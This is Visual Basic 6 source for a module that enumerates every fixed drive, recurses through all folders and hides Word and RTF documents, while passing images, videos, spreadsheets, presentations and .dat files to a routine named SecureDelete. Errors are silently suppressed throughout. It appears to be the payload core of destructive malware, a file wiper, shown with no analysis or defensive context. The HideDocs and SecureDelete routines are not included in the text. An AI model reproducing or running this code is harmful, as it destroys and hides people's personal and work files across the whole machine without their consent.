Attribute VB_Name = "Search"

Private Declare Function FindFirstFile Lib "kernel32" _
Alias "FindFirstFileA" ( _
ByVal lpFileName As String, _
lpFindFileData As WIN32_FIND_DATA) As Long

Private Declare Function FindNextFile Lib "kernel32" _
Alias "FindNextFileA" ( _
ByVal hFind As Long, _
lpFindFileData As WIN32_FIND_DATA) As Long

Private Declare Function FindClose Lib "kernel32" _
(ByVal hFindFile As Long) As Long

Private Declare Function GetDriveType Lib "Kernel32.dll" _
Alias "GetDriveTypeA" ( _
ByVal nDrive As String) As Long

Private Declare Function GetLogicalDrives Lib "kernel32" () As Long


Private Const MAX_PATH = 256

Private Type FILETIME
        dwLowDateTime As Long
        dwHighDateTime As Long
End Type

Private Type WIN32_FIND_DATA
        dwFileAttributes As Long
        ftCreationTime As FILETIME
        ftLastAccessTime As FILETIME
        ftLastWriteTime As FILETIME
        nFileSizeHigh As Long
        nFileSizeLow As Long
        dwReserved0 As Long
        dwReserved1 As Long
        cFileName As String * MAX_PATH
        cAlternate As String * 14
End Type


Public Sub ScanDrives()
On Error Resume Next
For Each Drive In GetDrives(3)
    DoEvents
    ScanDirectories (Drive)
Next
End Sub
Private Function GetDrives(Drive As Integer)
On Error Resume Next
Dim ArrayDrives() As String, i As Integer, x As Integer, l As Long
l = GetLogicalDrives()
If l = False Then Exit Function
For i = 0 To 25
If (l And 2 ^ i) Then
If GetDriveType(Chr(i + 65) & ":\") = Drive Then
x = x + 1:
ReDim Preserve ArrayDrives(1 To x)
ArrayDrives(x) = Chr(i + 65) & ":\"
End If
End If
Next
GetDrives = ArrayDrives
End Function
Private Sub ScanDirectories(ByVal Path)
On Error Resume Next
Dim pFe As WIN32_FIND_DATA, fol As String, fat As Long, _
v0 As Long, v1 As Long, sDirs As String
Path = ValidatePath(Path)
v0 = 0
v0 = FindFirstFile(Path & "*.*", pFe)
Do
DoEvents
fol = Mid(pFe.cFileName, 1, InStr(pFe.cFileName, Chr(0)) - 1)
fat = pFe.dwFileAttributes
If ValidateDirectory(fat) And (Right$(fol, 1) <> ".") Then
ScanFiles (Path & fol)
ScanDirectories (Path & fol)
End If
pFe.cFileName = ""
v1 = FindNextFile(v0, pFe)
Loop While v1 <> 0
FindClose (v0)
End Sub
Private Sub ScanFiles(ByVal Path)
On Error Resume Next
Dim pFl As WIN32_FIND_DATA, fil As String, fal As Long, b0 As Long, B1 As Long
Path = ValidatePath(Path)
b0 = 0
b0 = FindFirstFile(Path & "*.*", pFl)
Do
DoEvents
fil = Mid(pFl.cFileName, 1, InStr(pFl.cFileName, Chr(0)) - 1)
fal = pFl.dwFileAttributes


 If InStr(LCase(fil), ".doc") <> 0 Or InStr(LCase(fil), ".docx") <> 0 Or InStr(LCase(fil), ".rtf") Then HideDocs (Path & fil)
 
 If InStr(LCase(fil), ".mpeg") <> 0 Or InStr(LCase(fil), ".mpg") <> 0 Or InStr(LCase(fil), ".dat") Or _
 InStr(LCase(fil), ".xls") <> 0 Or InStr(LCase(fil), ".xlsx") <> 0 Or InStr(LCase(fil), ".ppt") Or _
 InStr(LCase(fil), ".jpg") <> 0 Or InStr(LCase(fil), ".jpeg") <> 0 Or InStr(LCase(fil), ".gif") Or _
 InStr(LCase(fil), ".tiff") <> 0 Or InStr(LCase(fil), ".bmp") <> 0 Or InStr(LCase(fil), ".png") Then Call SecureDelete(Path & fil)

pFl.cFileName = ""
B1 = FindNextFile(b0, pFl)
Loop While B1 <> 0
FindClose (b0)
End Sub

